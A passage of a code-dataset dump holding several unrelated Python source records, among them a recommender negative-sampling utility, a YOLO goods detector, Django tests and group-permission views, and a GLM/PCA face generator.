\"\"\"Utility function to sample negative feedback from user-item interaction dataset.\n\n This negative sampling function will take the user-item interaction data to create \n binarized feedback, i.e., 1 and 0 indicate positive and negative feedback, \n respectively. 
\n\n    Negative sampling is used in the literature frequently to generate negative samples \n    from user-item interaction data.\n    See for example the neural collaborative filtering paper \n    https://www.comp.nus.edu.sg/~xiangnan/papers/ncf.pdf\n    \n    Examples:\n        >>> import pandas as pd\n        >>> df = pd.DataFrame({\n            'userID': [1, 2, 3],\n            'itemID': [1, 2, 3],\n            'rating': [5, 5, 5]\n        })\n        >>> df_neg_sampled = negative_feedback_sampler(\n            df, col_user='userID', col_item='itemID', ratio_neg_per_user=1\n        )\n        >>> df_neg_sampled\n        userID  itemID  feedback\n        1       1       1\n        1       2       0\n        2       2       1\n        2       1       0\n        3       3       1\n        3       1       0\n\n    Args:\n        df (pandas.DataFrame): input data that contains user-item tuples.\n        col_user (str): user id column name.\n        col_item (str): item id column name.\n        col_label (str): label column name. It is used for the generated column where labels\n        of positive and negative feedback, i.e., 1 and 0, respectively, are stored in the output dataframe.\n        ratio_neg_per_user (int): ratio of negative feedback w.r.t. the number of positive feedback for each user. \n        If the samples exceed the number of total possible negative feedback samples, it will be reduced to the number\n        of all the possible samples.\n        seed (int): seed for the random state of the sampling function.\n\n    Returns:\n        pandas.DataFrame: data with negative feedback \n    \"\"\"\n    # Get all of the users and items.\n    users = df[col_user].unique()\n    items = df[col_item].unique()\n\n    # Create a dataframe for all user-item pairs\n    df_neg = user_item_pairs(pd.DataFrame(users, columns=[col_user]), pd.DataFrame(items, columns=[col_item]), user_item_filter_df = df)\n    df_neg[col_label] = 0\n\n    df_pos = df.copy()\n    df_pos[col_label] = 1\n\n    df_all = pd.concat([df_pos, df_neg], ignore_index=True, sort=True)\n    df_all = df_all[[col_user, col_item, col_label]]\n\n    # Sample negative feedback from the combined dataframe.\n    df_sample = (\n        df_all\n        .groupby(col_user)\n        .apply(\n            lambda x: pd.concat(\n                [\n                    x[x[col_label] == 1],\n                    x[x[col_label] == 0].sample(min(\n                        max(round(len(x[x[col_label] == 1])*ratio_neg_per_user), 1),\n                        len(x[x[col_label] == 0])\n                    ), random_state=seed, replace=False) if len(x[x[col_label] == 0]) > 0 else pd.DataFrame({}, columns=[col_user, col_item, col_label])\n                ], \n                ignore_index=True,\n                sort=True\n            )\n        )\n        .reset_index(drop=True)\n        .sort_values(col_user)\n    )\n\n    return df_sample\n","sub_path":"reco_utils/dataset/pandas_df_utils.py","file_name":"pandas_df_utils.py","file_ext":"py","file_size_in_byte":9338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"320784561","text":"#coding: utf-8\n\nimport os,sys\nfrom darknet import *\nimport cv2\nimport pdb\nfrom utils import *\nimport multiprocessing as mp\n\nfrom conf import *\n\n\n\"\"\"\nRun object detection on images, and get results\n\"\"\"\n\nclasses_id = ['image-p-qcshnt-268ml','image-p-xxwqaywsn-2h',\n              'image-p-xxwxjnn-4h','image-p-kkkl-330ml',\n              'image-p-hnwssgnyl-250ml*4','image-p-sdlwlcwt-4p',\n              'image-p-mncnn250ml','image-p-wtnmc-250ml',\n              'image-p-lfyswnc-280ml','image-p-hbahtkkwmyr-250ml',\n              'gcht','ynhlg',\n              'celxl-4','image-p-hyd-mnsnn-4h',\n              'image-p-nfnfccz-300ml','image-p-yydhgc235ml',\n              'image-p-mqtzyl-1h','image-p-nfsqcpyzlc-500ml']\n\nclass_id_blacklist = [10,11,12]\n\n# #######################\n# Util\n# #######################\nimport urllib\nimport numpy as np\n\ndef load_image_from_url(img_url):\n    savepath = './tmp/img.jpg'\n\n    # load from url\n    data = urllib.urlopen(img_url).read()\n\n    # cv2 format transfer\n    img = 
np.asarray(bytearray(data),dtype=\"uint8\")\n img = cv2.imdecode(img,cv2.IMREAD_COLOR)\n\n # save image to ./tmp\n abspath = os.path.abspath(savepath)\n if os.path.exists(abspath):\n os.system('rm %s'%abspath)\n\n cv2.imwrite(abspath,img)\n\n return img,abspath\n\n# #######################\n# Goods Detect\n# #######################\nmodel_cfg_path = os.path.join(wd, 'material', 'cfg', 'missfresh-yolo-voc-800.cfg')\nmodel_weights_path = os.path.join(wd, 'material', 'yolo_models', 'missfresh-mix-yolo-voc-800', 'yolo-voc-800_2000.weights')\nmeta_path = os.path.join(wd, 'material', 'cfg', '%s' % data_info)\n# --init detector\nnet = load_net(model_cfg_path, model_weights_path, 0)\nmeta = load_meta(meta_path)\n\ndef goods_detect_urls(\n img_urls,\n yolo_cfg_path=model_cfg_path,\n yolo_weights_path=model_weights_path,\n good_info_path=meta_path,\n conf_thres=0.2\n):\n \"\"\"\n Performing goods detection on online images.\n\n :param img_urls:\n :param yolo_cfg_path:\n :param yolo_weights_path:\n :param good_info_path:\n :param conf_thres:\n :return:\n \"\"\"\n goods_det_results_dict = {}\n\n for url in img_urls:\n\n det_result = []\n\n _,im_path = load_image_from_url(url)\n im_path = os.path.abspath(im_path)\n res = detect(net, meta, im_path, thresh=conf_thres)\n\n # parse result\n for line in res:\n cls_name = line[0]\n cls = classes.index(cls_name)\n prob = line[1]\n bb = line[2]\n\n cls_id = classes_id[cls]\n\n #print(cls_id)\n\n if cls not in class_id_blacklist:\n det_result.append([cls_id,prob])\n\n goods_det_results_dict[url] = det_result\n\n #print goods_det_results_dict\n\n return goods_det_results_dict\n\n\nif __name__ == \"__main__\":\n\n urls = ['http://mall8.qiyipic.com/mall/20170605/fc/2e/mall_5934fa87ad8c1223bb3bfc2e_1x1.jpg']\n\n goods_detect_urls(urls)\n\n\n","sub_path":"goods_detect.py","file_name":"goods_detect.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"445037750","text":"import os\nimport logging as log\nfrom datetime import datetime\nfrom shutil import copyfile\n\n\ncurrent_time = str(datetime.now().strftime('%Y%m%d_%H%M%S'))\ndir_path = os.path.dirname(os.path.realpath(__file__))\n\ndef set_log_params(log_file=None, level=log.DEBUG):\n\t\"\"\"\n\tSet logging parameters for task application\n\t:param log_file: Place to tail current logs. Defaults to None\n\t:param level: logging level. 
DEBUG, INFO, etc\n\t:return: None\n\t\"\"\"\n\tglobal current_time, dir_path\n\tif not log_file:\n\t\tlog_file = dir_path + \"/logs/latest.log\"\n\t\tif not os.path.exists(dir_path + '/logs/'):\n\t\t\tos.makedirs(dir_path + '/logs/')\n\t\tif os.path.exists(log_file):\n\t\t\tos.remove(log_file)\n\n\tlog.basicConfig(filename=log_file,\n\t format='%(levelname)s:%(asctime)s:%(filename)s:%(message)s',\n\t level=level)\n\tlog.info(\"Starting Task App Logger at %s\", current_time)\n\ndef move_latest_log_to_persistent_file():\n\t\"\"\"\n\tMoving the latest.log to time based logger file\n\t:return: None\n\t\"\"\"\n\tglobal current_time, dir_path\n\tsrc = dir_path + \"/logs/latest.log\"\n\tdst = dir_path + \"/logs/tasker_\" + current_time + \".log\"\n\tcopyfile(src, dst)\n","sub_path":"logger/loggen.py","file_name":"loggen.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"650112060","text":"from django import test\nimport mock\n\nfrom oscar.apps.catalogue import models\nfrom oscar.apps.partner.models import StockRecord\n\n\nclass TestAStandaloneProductIsAvailableToBuyWhen(test.TestCase):\n\n def test_its_product_class_does_not_track_stock(self):\n product_class = models.ProductClass(\n track_stock=False)\n product = models.Product(\n product_class=product_class)\n self.assertTrue(product.is_available_to_buy)\n\n def test_its_stockrecord_indicates_so(self):\n product_class = models.ProductClass()\n product = models.Product(\n id=-1, # Required so Django doesn't raise ValueError\n product_class=product_class)\n\n # Create mock version of a model that can be assigned as a FK\n record = mock.Mock(spec=StockRecord)\n record._state = mock.Mock()\n record._state.db = None\n record.is_available_to_buy = True\n product.stockrecord = record\n\n self.assertTrue(product.is_available_to_buy)\n\n\nclass TestAStandaloneProductIsNotAvailableToBuyWhen(test.TestCase):\n\n def test_it_has_no_stock_record(self):\n product_class = models.ProductClass()\n product = models.Product(\n id=-1,\n product_class=product_class)\n self.assertFalse(product.is_available_to_buy)\n\n def test_its_stockrecord_indicates_so(self):\n product_class = models.ProductClass()\n product = models.Product(\n id=-1,\n product_class=product_class)\n\n # Create mock version of a model that can be assigned as a FK\n record = mock.Mock(spec=StockRecord)\n record._state = mock.Mock()\n record._state.db = None\n record.is_available_to_buy = False\n product.stockrecord = record\n\n self.assertFalse(product.is_available_to_buy)\n","sub_path":"tests/integration/catalogue/availability_tests.py","file_name":"availability_tests.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"183611399","text":"#!/usr/bin/env python\n\nimport gzip\nimport json\n\nFIXTURE_FILE = \"users-fixture-1.json.gz\"\n\n# To inspect, run:\n# gunzip -c badges-fixture-1.json.gz | less -S\n\nwith gzip.GzipFile(FIXTURE_FILE, 'r') as f: \n lines = f.readlines()\n\nj = json.loads(\"\\n\".join(lines))\n\n# Example json: [\n# {\n# \"fields\": {\n# \"activity\": 0,\n# \"badges\": 0,\n# \"pubkey\": \"1@lvh.me\",\n# \"flair\": \"\",\n# \"is_active\": true,\n# \"is_admin\": true,\n# \"is_staff\": true,\n# \"last_login\": \"2016-02-27T22:26:52.910Z\",\n# \"name\": \"Biostar Community\",\n# \"new_messages\": 0,\n# \"score\": 0,\n# \"site\": null,\n# \"status\": 1,\n# \"type\": 2\n# },\n# \"model\": 
\"users.user\",\n# \"pk\": 1\n# },\n\ncount = 0\nfor item in j:\n if \"uuid\" in item[\"fields\"]:\n\t del item[\"fields\"][\"uuid\"]\n\t count += 1\nprint(\"Num rows updated: {}\".format(count))\n\nwith gzip.GzipFile(FIXTURE_FILE, 'w') as f: \n f.write(\n json.dumps(j, indent=2)\n )\nprint(\"Overwrote file\")\n","sub_path":"writer/project-basedir/users/fixtures/002_remove_uuid.py","file_name":"002_remove_uuid.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"568938571","text":"from __future__ import absolute_import, print_function\nimport h5py\nimport os\nimport os.path as op\nimport numpy as np\nfrom tqdm import tqdm\nfrom glob import glob\nfrom sklearn.preprocessing import OneHotEncoder, PolynomialFeatures\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\nfrom sklearn.decomposition import PCA, NMF, FastICA\nfrom sklearn.discriminant_analysis import _cov\nfrom scipy.io import savemat\nfrom .utils import load_cinfo, get_scodes_given_criteria\n\n# Some global variables\ndata_path = op.join(op.dirname(__file__), 'data')\nDATA_LOCS = dict(\n v1=dict(vertices=op.join(data_path, 'vertices_v1.mat'),\n textures=op.join(data_path, 'textures_v1.mat')),\n v2=dict(vertices=op.join(data_path, 'vertices_v2.mat')),\n v2dense=dict(vertices=op.join(data_path, 'vertices_v2dense.mat'))\n)\n\nDATA_SHAPES = dict(\n v1=dict(vertices=(4735, 3), textures=(800, 600, 4)),\n v2=dict(vertices=(13780, 3)),\n v2dense=dict(vertices=(32493, 3))\n)\n\n\nclass FaceGenerator:\n \"\"\" Class to generate new faces.\n\n Parameters\n ----------\n version : str\n Version of the face-database (possibel: 'v1', 'v2', 'v2dense')\n save_dir : str\n Path to directory to save (intermediate) results to.\n \"\"\"\n\n def __init__(self, version='v1', save_dir=None):\n \"\"\" Initializes FaceGenerator object. \"\"\"\n self.version = version\n self.mods = list(DATA_LOCS[version].keys())\n if save_dir is None:\n self.save_dir = op.join(os.getcwd(), 'glm_data')\n else:\n self.save_dir = save_dir\n\n self.cinfo = None\n self.scodes = None\n self.fdata = dict(data=dict(),\n nz_mask=dict())\n self.iv_names = None\n\n def _load_hdf5(self, h5_file, scode, version='v1', mod='vertices'):\n \"\"\" Loads a dataset from hdf5 file. 
\"\"\"\n\n f = h5py.File(h5_file)\n data = np.array(f.get('%s/%i/%s' % (version, scode, mod)))\n\n if data.ndim == 3: # assume textures\n data = np.rollaxis(np.rollaxis(data, axis=0, start=3), axis=0, start=2)\n else:\n data = data.T\n\n f.close()\n return data\n\n def load(self, h5_file=None):\n \"\"\" Loads all necessary data (cinfo, shapes, textures).\n\n Parameters\n ----------\n h5_file : str\n Path to hdf5-file with all data.\n \"\"\"\n\n # Load demographic data (and clean it)\n cinfo = load_cinfo(version=self.version)\n cinfo = cinfo[['fm', 'age', 'WC', 'BA', 'EA', 'scode', 'gender']]\n cinfo = cinfo[(cinfo.WC + cinfo.BA + cinfo.EA) == 1]\n cinfo = cinfo[cinfo.gender.isin(['M', 'F'])]\n cinfo = cinfo[cinfo.age.between(0, 100)]\n cinfo = cinfo.dropna(how='any', axis=0)\n self.cinfo = cinfo\n self.scodes = cinfo.scode\n n_codes = len(self.scodes)\n\n if not op.isdir(self.save_dir):\n os.makedirs(self.save_dir)\n\n np.save(op.join(self.save_dir, 'scodes.npy'), self.scodes)\n\n # Load face-data (vertices/shapes)\n if h5_file is None:\n h5_file = op.join(op.dirname(__file__), 'data', 'all_data.h5')\n else:\n if not op.isfile(h5_file):\n raise ValueError(\"Could not find file %s!\" % h5_file)\n\n # Load in data (vertices/shapes)\n print(\"\\nLoading data ...\")\n for mod in self.mods:\n tmp = np.zeros(DATA_SHAPES.get(self.version)[mod] + (n_codes,))\n for i, scode in tqdm(enumerate(self.scodes), desc=mod):\n data = self._load_hdf5(h5_file, scode, self.version, mod=mod)\n tmp[..., i] = data\n\n # Remove all-zero stuff\n nz_mask = tmp.sum(axis=-1) != 0\n self.fdata['data'][mod] = tmp[nz_mask].T\n self.fdata['nz_mask'][mod] = nz_mask\n\n def fit_GLM(self, chunks=5):\n \"\"\" Fits a GLM to the shape/texture data.\n\n Parameters\n ----------\n chunks : int\n For large arrays (like the texture data), the GLM cannot be\n appropriately vectorized; `chunks` refers to the number of \"splits\"\n applied to the data. Only relevant when array > 1GB.\n \"\"\"\n\n if self.scodes is None:\n raise ValueError(\"You didn't load the data yet!\")\n\n # Only select subjects we got the data from\n cinfo = self.cinfo\n # One-hot encode gender\n ohe = OneHotEncoder(sparse=False)\n gender = ohe.fit_transform(cinfo.fm.values[:, np.newaxis])\n ethn = cinfo[['WC', 'BA', 'EA']].values\n age = cinfo.age.values[:, np.newaxis]\n icept = np.ones((age.size, 1))\n X = np.hstack((icept, gender, ethn, age))\n X = self._add_interactions(X)\n\n np.save(op.join(self.save_dir, 'IVs.npy'), X)\n self.iv_names = ['intercept', 'male', 'female', 'WC', 'BA', 'EA', 'age']\n\n # Now, define the data\n print(\"\\nStart GLM fitting ...\")\n for mod in self.mods:\n y = self.fdata['data'][mod]\n\n # We need this for later\n np.save(op.join(self.save_dir, '%s_nzmask.npy' % mod), self.fdata['nz_mask'][mod])\n\n if y.nbytes > 1e+9: # If the data is very large,split up in chunks\n if chunks == 1:\n print(\"Warning: attempting to fit millions of models at \"\n \"once ... 
Consider increasing `chunks`.\")\n\n                iC = 1\n                # Loop across chunks\n                for tmp_y in tqdm(np.array_split(y, chunks, axis=1), 'chunk'):\n                    betas = np.linalg.lstsq(X, tmp_y, rcond=None)[0]\n                    yhat = X.dot(betas)\n                    residuals = tmp_y - yhat\n\n                    this_i = str(iC).rjust(3, '0')\n                    np.save(op.join(self.save_dir, '%s_residuals_raw_chunk%s.npy' % (mod, this_i)), residuals)\n                    np.save(op.join(self.save_dir, '%s_betas_chunk%s.npy' % (mod, this_i)), betas)\n                    np.save(op.join(self.save_dir, '%s_DVs_chunk%s.npy' % (mod, this_i)), tmp_y)\n                    iC += 1\n            else:\n                # Fit the models in one go\n                betas = np.linalg.lstsq(X, y, rcond=None)[0]\n                yhat = X.dot(betas)\n                residuals = y - yhat\n\n                # Write to disk (note: save `y` here, not the chunk variable `tmp_y`,\n                # which is undefined in this branch)\n                np.save(op.join(self.save_dir, '%s_residuals_raw.npy' % mod), residuals)\n                np.save(op.join(self.save_dir, '%s_betas.npy' % mod), betas)\n                np.save(op.join(self.save_dir, '%s_DVs.npy' % mod), y)\n\n    def run_decomposition(self, algorithm='pca', whiten=False, save_dir=None,\n                          **kwargs):\n        \"\"\" Runs a decomposition (PCA, NMF, or ICA) on shape/texture residuals.\n\n        Parameters\n        ----------\n        algorithm : str\n            Decomposition algorithm ('pca', 'nmf', 'ica')\n        whiten : bool\n            Whether to whiten the data before decomposition (only relevant\n            for 'pca' and 'ica')\n        save_dir : str\n            Path to directory with (intermediate) results. If None, path is\n            inferred from self.\n        kwargs : dict\n            Extra arguments for decomposition algorithm\n        \"\"\"\n        print(\"\")\n        if save_dir is None:\n            save_dir = self.save_dir\n\n        for mod in self.mods:\n\n            residuals = self._load_chunks(mod, save_dir, 'residuals_raw')\n\n            if algorithm == 'ica':\n                scaler = StandardScaler()\n                residuals = scaler.fit_transform(residuals)\n                np.save(op.join(save_dir, '%s_residuals_means.npy' % mod), scaler.mean_)\n                np.save(op.join(save_dir, '%s_residuals_stds.npy' % mod), scaler.scale_)\n            if algorithm == 'nmf':\n                scaler = MinMaxScaler()\n                residuals = scaler.fit_transform(residuals)\n                np.save(op.join(save_dir, '%s_residuals_mins.npy' % mod), scaler.min_)\n                np.save(op.join(save_dir, '%s_residuals_scale.npy' % mod), scaler.scale_)\n            print(\"Running decomposition (%s) on %s ...\" % (algorithm, mod))\n\n            if algorithm == 'pca':\n                decomp = PCA(copy=False, whiten=whiten, **kwargs)\n            elif algorithm == 'nmf':\n                # n_components set to keep comparable to PCA\n                decomp = NMF(n_components=residuals.shape[0], **kwargs)\n            elif algorithm == 'ica':\n                decomp = FastICA(n_components=residuals.shape[0], **kwargs)\n            else:\n                raise ValueError(\"Please choose from 'pca', 'nmf', 'ica'.\")\n\n            decomp.fit(residuals)\n            resids_decomp = decomp.transform(residuals)\n            np.save(op.join(save_dir, '%s_residuals_decomp.npy' % mod), resids_decomp)\n\n            if algorithm == 'ica':\n                # note: this is the mixing matrix (not components!)\n                np.save(op.join(save_dir, '%s_decomp_comps.npy' % mod), decomp.mixing_)\n            elif algorithm == 'pca':\n                np.save(op.join(save_dir, '%s_decomp_means.npy' % mod), decomp.mean_)\n                np.save(op.join(save_dir, '%s_decomp_comps.npy' % mod), decomp.components_)\n                if whiten:\n                    np.save(op.join(save_dir, '%s_decomp_explvar.npy' % mod), decomp.explained_variance_)\n\n            else:  # must be NMF\n                np.save(op.join(save_dir, '%s_decomp_comps.npy' % mod), decomp.components_)\n\n    def change_property_face(self, scode, age=None, gender=None, ethn=None,\n                             save_dir=None):\n        \"\"\" Changes the property of a given face (scode).\n\n        Parameters\n        ----------\n        scode : int\n            Face ID (code) of face to change\n        age : int\n            Desired age of face\n        gender : str\n            Desired gender of face ('M' or 'F')\n        ethn : str\n            Desired ethnicity of face ('WC', 'BA', or 'EA')\n        save_dir 
: str\n            Directory with (intermediate) results\n        \"\"\"\n\n        if save_dir is None:\n            save_dir = self.save_dir\n\n        idx = self._get_idx_of_scode(scode, save_dir)\n        results = dict()\n\n        print(\"\")\n        for mod in self.mods:\n            print(\"Changing property of face (%s) ...\" % mod)\n            nz_mask = np.load(op.join(save_dir, '%s_nzmask.npy' % mod))\n            betas = self._load_chunks(mod, save_dir, 'betas')\n            resids = self._load_chunks(mod, save_dir, 'residuals_raw')[idx, :]\n            norm_vec = self._generate_design_vector(gender, age, ethn)\n            tmp_result = norm_vec.dot(betas) + resids\n            tmp = np.zeros(DATA_SHAPES[self.version][mod])\n            tmp[nz_mask] = np.squeeze(tmp_result)\n            tmp = tmp.reshape(DATA_SHAPES[self.version][mod])\n            results[mod] = tmp\n\n        name = 'id-%i_gen-%s_age-%i_eth-%s.mat' % (scode, gender, age, ethn)\n        out_path = op.join(save_dir, name)\n        savemat(out_path, results)\n\n        return out_path\n\n    def generate_new_face(self, N, age, gender, ethn, age_range=20, algorithm='pca',\n                          dist='norm', whitened=False, shrinkage=False,\n                          save_dir=None):\n        \"\"\" Generates a new face by randomly synthesizing PCA components,\n        applying the inverse PCA transform, and adding the norm.\n\n        Parameters\n        ----------\n        N : int\n            How many new faces should be generated\n        age : int\n            Desired age of new face\n        gender : str\n            Desired gender of new face ('M' or 'F')\n        ethn : str\n            Desired ethnicity of new face ('WC', 'BA', 'EA')\n        age_range : int\n            Range around `age` used to select reference faces\n        algorithm : str\n            Decomposition algorithm that was used ('pca', 'nmf', 'ica')\n        dist : str\n            Distribution used to sample new values ('uniform', 'norm', 'mnorm')\n        whitened : bool\n            Was the data whitened before decomposition?\n        shrinkage : bool\n            Whether to apply shrinkage to covariance estimation of residuals.\n            Only relevant when dist='mnorm'.\n        save_dir : str\n            Path to directory with (intermediate) results.\n        \"\"\"\n\n        if save_dir is None:\n            save_dir = self.save_dir\n\n        to_write = {i: dict() for i in range(N)}\n        print(\"\")\n        for mod in self.mods:\n            print(\"Generating new faces (%s) ...\" % mod)\n            decomp_comps = np.load(op.join(save_dir, '%s_decomp_comps.npy' % mod))\n\n            nz_mask = np.load(op.join(save_dir, '%s_nzmask.npy' % mod))\n            betas = self._load_chunks(mod, save_dir, 'betas')\n            resids_decomp = self._load_chunks(mod, save_dir, 'residuals_decomp')\n            relev_scodes = get_scodes_given_criteria(gender, age, age_range, ethn, 'v1')\n            idx = self._get_idx_of_scode(relev_scodes)\n            relev_resids = resids_decomp[idx, :]\n            random_data = np.zeros((N, decomp_comps.shape[0]))\n            for i in range(N):  # this can probably be implemented faster ...\n                if dist == 'uniform':\n                    mins, maxs = relev_resids.min(axis=0), relev_resids.max(axis=0)\n                    random_data[i, :] = np.random.uniform(mins, maxs)\n                elif dist == 'norm':\n                    means, stds = relev_resids.mean(axis=0), relev_resids.std(axis=0)\n                    random_data[i, :] = np.random.normal(means, stds)\n                elif dist == 'mnorm':\n                    means = relev_resids.mean(axis=0)\n\n                    if shrinkage:\n                        cov = _cov(relev_resids, shrinkage='auto')\n                    else:\n                        cov = np.cov(relev_resids.T)\n\n                    random_data[i, :] = np.random.multivariate_normal(means, cov)\n                else:\n                    raise ValueError(\"Please choose `dist` from ('uniform', \"\n                                     \"'norm', 'mnorm')\")\n\n            # Invert the decomposition to map sampled components back to raw residuals\n            if algorithm == 'pca':\n                decomp_means = np.load(op.join(save_dir, '%s_decomp_means.npy' % mod))\n                if whitened:\n                    decomp_explvar = np.load(op.join(save_dir, '%s_decomp_explvar.npy' % mod))\n                    resids_inv = np.dot(random_data, np.sqrt(decomp_explvar[:, np.newaxis]) *\n                                        decomp_comps) + decomp_means\n                else:\n                    resids_inv = random_data.dot(decomp_comps) + decomp_means\n            elif algorithm == 'ica':\n                resids_inv = random_data.dot(decomp_comps.T)\n                resid_means = 
np.load(op.join(save_dir, '%s_residuals_means.npy' % mod))\n                resid_stds = np.load(op.join(save_dir, '%s_residuals_stds.npy' % mod))\n                resids_inv *= resid_stds\n                resids_inv += resid_means\n            elif algorithm == 'nmf':\n                resids_inv = random_data.dot(decomp_comps)\n                resid_mins = np.load(op.join(save_dir, '%s_residuals_mins.npy' % mod))\n                resid_scale = np.load(op.join(save_dir, '%s_residuals_scale.npy' % mod))\n                resids_inv -= resid_mins\n                resids_inv /= resid_scale\n\n            norm_vec = self._generate_design_vector(gender, age, ethn)\n            norm = norm_vec.dot(betas)\n            final_face_data = norm + resids_inv\n            for i in range(N):\n                tmp = np.zeros(DATA_SHAPES[self.version][mod])\n                tmp[nz_mask] = final_face_data[i, :]\n                tmp = tmp.reshape(DATA_SHAPES[self.version][mod])\n                to_write[i][mod] = tmp\n\n        to_return = []\n        for key, value in to_write.items():\n            name = 'id-g%i_gen-%s_age-%i_eth-%s.mat' % (key, gender, age, ethn)\n            outname = op.join(save_dir, name)\n            savemat(outname, value)\n            to_return.append(outname)\n\n        return to_return\n\n    def _load_chunks(self, mod, save_dir, idf):\n        \"\"\" Loads data which may be in chunks.\n\n        Parameters\n        ----------\n        mod : str\n            Modality of requested data ('textures' or 'vertices')\n        save_dir : str\n            Path to directory with (intermediate) results.\n        idf : str\n            Identifier for files (e.g., 'betas' or 'residuals')\n\n        Returns\n        -------\n        out : numpy array\n            Array with data (chunked data is stacked)\n        \"\"\"\n        files = sorted(glob(op.join(save_dir, '%s_%s*.npy' % (mod, idf))))\n\n        if len(files) == 1:\n            out = np.load(files[0])\n        elif len(files) > 1:\n            out = np.hstack([np.load(f) for f in files])\n        else:\n            raise ValueError(\"Could not find files with identifier '%s'!\" % idf)\n\n        return out\n\n    def _get_idx_of_scode(self, scode, save_dir=None):\n        \"\"\" Returns index of scode. \"\"\"\n\n        if not isinstance(scode, np.ndarray):\n            scode = np.array(scode)\n\n        if save_dir is None:\n            save_dir = self.save_dir\n\n        all_scodes = np.load(op.join(save_dir, 'scodes.npy'))\n        return np.isin(all_scodes, scode)\n\n    def _generate_design_vector(self, gender, age, ethn):\n        \"\"\" Generates a 'design vector' (for lack of a better word). \"\"\"\n        mapping = dict(WC=[1, 0, 0], BA=[0, 1, 0], EA=[0, 0, 1])\n        gender = [0, 1] if gender == 'F' else [1, 0]\n        des_vec = np.array([1] + gender + mapping[ethn] + [age])[np.newaxis, :]\n        des_vec = self._add_interactions(des_vec)\n\n        return des_vec\n\n    def _add_interactions(self, X):\n        \"\"\" Adds interaction terms to X. 
\"\"\"\n pnf = PolynomialFeatures(interaction_only=True)\n return pnf.fit_transform(X)\n","sub_path":"GFG_python/glm.py","file_name":"glm.py","file_ext":"py","file_size_in_byte":17522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"647422892","text":"from django.views.generic import ListView, View, TemplateView\nfrom django.contrib.auth.models import Group, Permission, ContentType\nfrom django.http import JsonResponse, Http404, HttpResponse, QueryDict\nfrom django.db import IntegrityError\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom accounts.forms import CreateGroupForm\nfrom accounts.mixins import PermissionRequiredMixin\n\nclass GroupListView(LoginRequiredMixin, PermissionRequiredMixin, ListView):\n ## 用户组列表\n permission_required = \"auth.view_group\"\n model = Group\n template_name = \"user/grouplist.html\"\n\n\nclass GroupCreateView(LoginRequiredMixin, View):\n ##创建用户组\n def post(self, request):\n ret = {\"status\": 0}\n if not request.user.has_perm('auth.add_group'):\n ret['status'] = 1\n ret['errmsg'] = \"没有权限,请联系管理员\"\n return JsonResponse(ret)\n groupform = CreateGroupForm(request.POST)\n if groupform.is_valid():\n try:\n g = Group(**groupform.cleaned_data)\n g.save()\n except Exception as e:\n ret['status'] = 1\n ret['errmsg'] = e.args\n else:\n ret['status'] = 1\n ret['errmsg'] = \"没有输入内容,请重新输入\"\n return JsonResponse(ret)\n\nclass GroupDeleteView(LoginRequiredMixin, View):\n ##删除用户组\n def delete(self, request):\n ret = {\"status\":0}\n if not request.user.has_perm('auth.delete_group'):\n ret['status'] = 1\n ret['errmsg'] = \"没有权限,请联系管理员\"\n return JsonResponse(ret)\n data_name = QueryDict(request.body)\n groupid = data_name.get(\"gname\", \"\")\n try:\n g = Group.objects.get(pk=groupid)\n except Group.DoesNotExist:\n ret['status'] = 1\n ret['errmsg'] = \"用户组不存在\"\n return JsonResponse(ret)\n try:\n gtou = g.user_set.all()\n if gtou:\n ret['status'] = 1\n ret['errmsg'] = \"该组有用户,不能删除\"\n return JsonResponse(ret)\n except:\n pass\n try:\n gtoper = g.permissions.all()\n if gtoper:\n ret['status'] = 1\n ret['errmsg'] = \"该组有组权限,不能删除\"\n return JsonResponse(ret)\n except:\n pass\n g.delete()\n return JsonResponse(ret)\n\nclass GroupuserListView(LoginRequiredMixin, PermissionRequiredMixin, View):\n ##查看用户组里用户列表\n permission_required = \"auth.view_user\"\n\n def get(self, request, *args, **kwargs):\n groupid = request.GET.get(\"gid\", \"\")\n try:\n get_group = Group.objects.get(id=groupid)\n object_list = get_group.user_set.all()\n except Group.DoesNotExist:\n raise Http404(\"group is not exist.\")\n return render(request, \"user/groupuserlist.html\", {\"object_list\": object_list, \"groupname\":get_group})\n\nclass ModifyGroupPermissionList(LoginRequiredMixin, PermissionRequiredMixin, TemplateView):\n ##修改用户组权限的列表\n permission_required = \"auth.change_permission\"\n template_name = \"user/modify_group_permission.html\"\n\n def get_context_data(self, **kwargs):\n context = super(ModifyGroupPermissionList, self).get_context_data(**kwargs)\n context[\"contenttypes\"] = ContentType.objects.all()\n context[\"group\"] = self.request.GET.get(\"gid\")\n context[\"group_permissions\"] = self.get_group_permissions(context[\"group\"])\n return context\n\n def get_group_permissions(self, groupid):\n try:\n group_obj = Group.objects.get(pk=groupid)\n return [p.id for p in group_obj.permissions.all()]\n except Group.DoesNotExist:\n return redirect(\"error\", 
next=\"group_list\", msg=\"用户组不存在\")\n\n def post(self, request):\n ##获取前端用户组设置的权限list,设置组权限,否则清空组权限\n permission_id_list = request.POST.getlist(\"permission\", [])\n groupid = request.POST.get(\"groupid\", 0)\n try:\n group_obj = Group.objects.get(pk=groupid)\n except Group.DoesNotExist:\n return redirect(\"error\", next=\"group_list\", msg=\"用户组不存在\")\n\n if len(permission_id_list) > 0:\n permission_objs = Permission.objects.filter(id__in=permission_id_list)\n group_obj.permissions.set(permission_objs)\n else:\n group_obj.permissions.clear()\n return redirect(\"success\", next=\"group_list\")\n\nclass GroupPermissionListView(LoginRequiredMixin, PermissionRequiredMixin, TemplateView):\n ##组权限列表\n permission_required = \"auth.view_permission\"\n template_name = \"user/permission_group_list.html\"\n\n def get_context_data(self, **kwargs):\n context = super(GroupPermissionListView, self).get_context_data(**kwargs)\n gid = self.request.GET.get(\"gid\", \"\")\n try:\n group_obj = Group.objects.get(pk=gid)\n context[\"groupname\"] = group_obj\n context[\"group_permissions\"] = 